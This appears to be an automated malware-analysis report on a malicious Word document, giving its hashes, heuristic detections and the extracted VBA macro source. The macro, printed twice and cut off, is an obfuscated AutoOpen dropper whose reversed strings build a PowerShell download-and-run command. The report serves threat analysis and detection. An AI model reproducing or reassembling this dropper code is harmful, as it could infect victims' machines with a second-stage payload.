Office (OLE) malware analysis — malicious · df50efd44753745e

MALICIOUS

Office (OLE)

105.0 KB Created: 2018-02-06 17:20:00 Authoring application: Microsoft Office Word First seen: 2018-02-07

MD5: dafb5a6fbc7f2abce1833876e9a23b8e SHA-1: 8e5e3d3a70c62e016e8ffadb35e6d02f58551001 SHA-256: df50efd44753745e2a716143c676f163374865d09eae338584ef409708f9fd10

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of execution, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its role as a dropper for malicious content.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25403 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	25403 bytes
SHA-256: `fb98126e44f2dad2592840e64b27d66e3f881548b71998b0317eebac775131ac`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VEKzcvHw" Sub AutoOpen() On Error Resume Next mNBPsmccm = LbDAmKizqIY - hQRJOUIfhNmmCV / (5504078 + TrnOmlM - 985303 + TFicGGQw) ojkziXITG = zpQwQhjfzVKMvE - zuOiDaHV / (7670615 + psElTfufo - 2891835 + wVpwvaGuo) ckjllctpD = pTcjapcufq - jHpzBYZiH / (9941246 + bzmFMTA - 8292892 + FcSZwTmPGSjb) Application.Run "HZwrdPKCdbjNZv", TXMbNoW EYvdqnjET = vWosdzUd - uoEJDoPA / (6532582 + KcpTYXaqcVfQ - 7519149 + whvkDqouc) JlnzProbn = RJiGDPV - GrIdiBm / (2103423 + tfwrzPzfhl - 4549343 + wousOVJU) End Sub Function TXMbNoW() On Error Resume Next rilCunsAlQ = nUijSszJO - aRmMaYGzwnIdR / (7163410 + rCiBJRpjQv - 3671201 + UGbpiMtMqGXU) BUCXGw = izuHJJCwM - qVHEZklVQGr / (7273068 + XzZRXYjkfKniT - 9064750 + HlQkHfkUbH) huDuw = bEkGNXsEWK - sfYjpLKUaFpM / (2849633 + qGiNmcwJDwb - 62158 + wPlPYPXtlM) MnItsTz = sjunkwsu + Mid(StrReverse("qXFvnlpRnVHwEzQLHijITTsIGlCMQ2I+Q2II'+'(QtrelQ2I+Q2IVGKIQ2I+Q2IFdQ2I+Q2IaQ2I+Q2IOVGKlQ2I+Q2InWVGKoDQ2I+Q2IQQ2Izizlh"), 6, 82) uGcXp = OrkhljbbF - nOFoqRzrlFuDX / (2497707 + rcpKiivaw - 4459919 + ohlJJkWAmv) plCcFpGrbh = sXVvirR - LTXOtGlRWK / (8375378 + GRSdPFbvJhWaX - 8258837 + RpnADIbLEQTs) qQUFY = XTzpvHu - FsjYQVNiwwr / (482999 + UbjKnffFOM - 9240903 + XXphhfPwH) NQhQZ = pZJGhOmsVcW + Mid(StrReverse("ACvZUwiZTBXqXiAoSYvD+Azs2Isecorp-draAzs+AzsobQ2HwsUzwGiSDvICVPiS"), 18, 27) FKWft = cpjDrQfHcO - qfkLszXzPR / (5304418 + PHiciAr - 3293065 + HsUXrUzQCY) WUlrC = ilVRWQupqkrCA - QvNowGkzwjnQ / (7646715 + dajNtoX - 5784241 + NFSGBaoPpTna) iCiKXnPDIFT = kcGRCknmdG - tMQDiJMMmJA / (6679573 + AiWJTwwAaEp - 703154 + clnqzjwp) KUVoLtAQL = zGbnnOhH + Mid(StrReverse("hClkCOjcjnWwjlXzLOQjmAKuCrwK"), 10, 3) klqBJAj = jtcQUNdSf - cSHaAXhb / (4867195 + JQjontMZiRpZmp - 1156478 + iLRZNhDo) XCaZi = uhkkNzjBs - TJncaAD / (6881179 + UCjSUqsVK - 9898343 + cNvbtMcpVSJY) HsqChlOBwBE = jmzriqYJzqTKOO - tUdWBJdFO / (2367607 + OYOOvLilihqB - 7455800 + aYfXbQfzMv) GMfbkmAoCb = pKkkjHao + Mid(StrReverse("NNdUKwtjUKBhCOcEWKahLasqBiCrAHc[+38]rAHc[((ecALPEr.)WVT+mSLKaYJD"), 9, 29) MVQoGnj = zbAujuIjcji - TqCblwi / (7605659 + DRLTNGYHBcAFWn - 8435730 + dvcTjDRirhw) WYXDrOcC = vzIwzjvKobVo - ZaEizwDKBHCG / (3934895 + AzhbfIoM - 390521 + CInrhlCanj) cilvrzbcKZ = cNwuluat - GrcXuLHzpjvNY / (6996229 + pILdPEbSkBY - 7396586 + huNOSJNKfQwW) DbqqqkE = omWkGhk + Mid(StrReverse("wII Q2I+Q2I=Q2I+Q2I Q2I+Q2IUYYYGI;Q2I+Q2ImodnQ'+'2I+Q2'+'IarQ2I+Q2I )HjStHjQ2IWV'+'T+WVT+QslaOfwDQHcwIvmokI"), 18, 88) HhkUfwQEis = iniYsWWYVSvShu - XVKsPHlCr / (2262846 + DUJVcRfRoWilnu - 5045551 + IkooHCoFuukTps) vqTNSY = nMvSBPApinPG - ojXwoJcSCXpAf / (711233 + ihLcvlvYrbY - 6630150 + uJArwwRK) uQXOB = lifPTkpGRV - ZGzbnKHs / (2105404 + WQbUXsWwEjm - 3191811 + vhwjRLjl) JWKTCwlVo = CkHozDcQEci + Mid(StrReverse("bCdIoCsi) )Azs+Azs63]rAHc[]gniRTS[,)98'+']rAHc[+17]rAHc[+37]rAHc[((ecALPEr.)29]rAHc[]gniRTS[,)Azs+Azs67]rAHWVT+WVTc[+9WVT+WVT7]rAHc[Azs+Azs+7'+'7]rAHc[((ecALPEr.)43WVT+'+'WVT]rAHc[]gAzs+AzsniRTSWVT+'+'WpslJjsloMRCZ"), 13, 194) wpcZQnK = YzrONDvvrTHNm - IvCtqiphbu / (2503279 + EljjzuRvN - 3282357 + jTskWTQdwQ) TbalwmPzBY = asKfMHwrXwBzzJ - KVNvqLra / (4156843 + wtTNLRQzGKr - 4243615 + iKwWtYiUt) pLizRO = KJuQAZmjRoF - OfdMfkBtz / (3919772 + DilupwCrFESIE - 3235902 + QYTbZhM) JHILm = CXjnMZDm + Mid(StrReverse("JuUZBJRQ2I+Q2IQIjGQ2I+Q2I/Q2I+Q2ImQ2I+Q2IocWVT+WVT.noitarotserQ2WVTAzs+Azs+'+'WVTI+Q2IzITzwadjwZfaoBZ"), 16, 79) iVArNblF = qlOiwkPzzJ - WZviUdZXuHrLpd / (9411970 + JznFqSkaP - 485972 + WqJjNKAuTkOZp) tMlPUTG = DvMzZYBzSFA - EFEoVORk / (504849 + lXdBpjdhuXzf - 7472423 + XaqisXYEjA) lDvYrBl = upiOAIE - WKoVYiRWlK / (5516889 + ZSjRuXnsf - 1712409 + ocvutwSuPsHP) KKshBUrGXs = vQsjstSzbq + Mid(StrReverse("BwGWVT69Azs+Azs]rAHc[]gniRTS[,)68]rA'+'Hc[+17]rAHc[+57]rWVT+WVTAHc[((ecA'+'LPEr'+'.)Q2I}Q2I+Q2I}{Azs+A'+'zsQ2I ... (truncated)

SHA-256: fb98126e44f2dad2592840e64b27d66e3f881548b71998b0317eebac775131ac

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VEKzcvHw"
Sub AutoOpen()
On Error Resume Next
mNBPsmccm = LbDAmKizqIY - hQRJOUIfhNmmCV / (5504078 + TrnOmlM - 985303 + TFicGGQw)
ojkziXITG = zpQwQhjfzVKMvE - zuOiDaHV / (7670615 + psElTfufo - 2891835 + wVpwvaGuo)
ckjllctpD = pTcjapcufq - jHpzBYZiH / (9941246 + bzmFMTA - 8292892 + FcSZwTmPGSjb)
Application.Run "HZwrdPKCdbjNZv", TXMbNoW
EYvdqnjET = vWosdzUd - uoEJDoPA / (6532582 + KcpTYXaqcVfQ - 7519149 + whvkDqouc)
JlnzProbn = RJiGDPV - GrIdiBm / (2103423 + tfwrzPzfhl - 4549343 + wousOVJU)
End Sub
Function TXMbNoW()
On Error Resume Next
rilCunsAlQ = nUijSszJO - aRmMaYGzwnIdR / (7163410 + rCiBJRpjQv - 3671201 + UGbpiMtMqGXU)
BUCXGw = izuHJJCwM - qVHEZklVQGr / (7273068 + XzZRXYjkfKniT - 9064750 + HlQkHfkUbH)
huDuw = bEkGNXsEWK - sfYjpLKUaFpM / (2849633 + qGiNmcwJDwb - 62158 + wPlPYPXtlM)
MnItsTz = sjunkwsu + Mid(StrReverse("qXFvnlpRnVHwEzQLHijITTsIGlCMQ2I+Q2II'+'(QtrelQ2I+Q2IVGKIQ2I+Q2IFdQ2I+Q2IaQ2I+Q2IOVGKlQ2I+Q2InWVGKoDQ2I+Q2IQQ2Izizlh"), 6, 82)
uGcXp = OrkhljbbF - nOFoqRzrlFuDX / (2497707 + rcpKiivaw - 4459919 + ohlJJkWAmv)
plCcFpGrbh = sXVvirR - LTXOtGlRWK / (8375378 + GRSdPFbvJhWaX - 8258837 + RpnADIbLEQTs)
qQUFY = XTzpvHu - FsjYQVNiwwr / (482999 + UbjKnffFOM - 9240903 + XXphhfPwH)
NQhQZ = pZJGhOmsVcW + Mid(StrReverse("ACvZUwiZTBXqXiAoSYvD+Azs2Isecorp-draAzs+AzsobQ2HwsUzwGiSDvICVPiS"), 18, 27)
FKWft = cpjDrQfHcO - qfkLszXzPR / (5304418 + PHiciAr - 3293065 + HsUXrUzQCY)
WUlrC = ilVRWQupqkrCA - QvNowGkzwjnQ / (7646715 + dajNtoX - 5784241 + NFSGBaoPpTna)
iCiKXnPDIFT = kcGRCknmdG - tMQDiJMMmJA / (6679573 + AiWJTwwAaEp - 703154 + clnqzjwp)
KUVoLtAQL = zGbnnOhH + Mid(StrReverse("hClkCOjcjnWwjlXzLOQjmAKuCrwK"), 10, 3)
klqBJAj = jtcQUNdSf - cSHaAXhb / (4867195 + JQjontMZiRpZmp - 1156478 + iLRZNhDo)
XCaZi = uhkkNzjBs - TJncaAD / (6881179 + UCjSUqsVK - 9898343 + cNvbtMcpVSJY)
HsqChlOBwBE = jmzriqYJzqTKOO - tUdWBJdFO / (2367607 + OYOOvLilihqB - 7455800 + aYfXbQfzMv)
GMfbkmAoCb = pKkkjHao + Mid(StrReverse("NNdUKwtjUKBhCOcEWKahLasqBiCrAHc[+38]rAHc[((ecALPEr.)WVT+mSLKaYJD"), 9, 29)
MVQoGnj = zbAujuIjcji - TqCblwi / (7605659 + DRLTNGYHBcAFWn - 8435730 + dvcTjDRirhw)
WYXDrOcC = vzIwzjvKobVo - ZaEizwDKBHCG / (3934895 + AzhbfIoM - 390521 + CInrhlCanj)
cilvrzbcKZ = cNwuluat - GrcXuLHzpjvNY / (6996229 + pILdPEbSkBY - 7396586 + huNOSJNKfQwW)
DbqqqkE = omWkGhk + Mid(StrReverse("wII Q2I+Q2I=Q2I+Q2I Q2I+Q2IUYYYGI;Q2I+Q2ImodnQ'+'2I+Q2'+'IarQ2I+Q2I )HjStHjQ2IWV'+'T+WVT+QslaOfwDQHcwIvmokI"), 18, 88)
HhkUfwQEis = iniYsWWYVSvShu - XVKsPHlCr / (2262846 + DUJVcRfRoWilnu - 5045551 + IkooHCoFuukTps)
vqTNSY = nMvSBPApinPG - ojXwoJcSCXpAf / (711233 + ihLcvlvYrbY - 6630150 + uJArwwRK)
uQXOB = lifPTkpGRV - ZGzbnKHs / (2105404 + WQbUXsWwEjm - 3191811 + vhwjRLjl)
JWKTCwlVo = CkHozDcQEci + Mid(StrReverse("bCdIoCsi) )Azs+Azs63]rAHc[]gniRTS[,)98'+']rAHc[+17]rAHc[+37]rAHc[((ecALPEr.)29]rAHc[]gniRTS[,)Azs+Azs67]rAHWVT+WVTc[+9WVT+WVT7]rAHc[Azs+Azs+7'+'7]rAHc[((ecALPEr.)43WVT+'+'WVT]rAHc[]gAzs+AzsniRTSWVT+'+'WpslJjsloMRCZ"), 13, 194)
wpcZQnK = YzrONDvvrTHNm - IvCtqiphbu / (2503279 + EljjzuRvN - 3282357 + jTskWTQdwQ)
TbalwmPzBY = asKfMHwrXwBzzJ - KVNvqLra / (4156843 + wtTNLRQzGKr - 4243615 + iKwWtYiUt)
pLizRO = KJuQAZmjRoF - OfdMfkBtz / (3919772 + DilupwCrFESIE - 3235902 + QYTbZhM)
JHILm = CXjnMZDm + Mid(StrReverse("JuUZBJRQ2I+Q2IQIjGQ2I+Q2I/Q2I+Q2ImQ2I+Q2IocWVT+WVT.noitarotserQ2WVTAzs+Azs+'+'WVTI+Q2IzITzwadjwZfaoBZ"), 16, 79)
iVArNblF = qlOiwkPzzJ - WZviUdZXuHrLpd / (9411970 + JznFqSkaP - 485972 + WqJjNKAuTkOZp)
tMlPUTG = DvMzZYBzSFA - EFEoVORk / (504849 + lXdBpjdhuXzf - 7472423 + XaqisXYEjA)
lDvYrBl = upiOAIE - WKoVYiRWlK / (5516889 + ZSjRuXnsf - 1712409 + ocvutwSuPsHP)
KKshBUrGXs = vQsjstSzbq + Mid(StrReverse("BwGWVT69Azs+Azs]rAHc[]gniRTS[,)68]rA'+'Hc[+17]rAHc[+57]rWVT+WVTAHc[((ecA'+'LPEr'+'.)Q2I}Q2I+Q2I}{Azs+A'+'zsQ2I
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.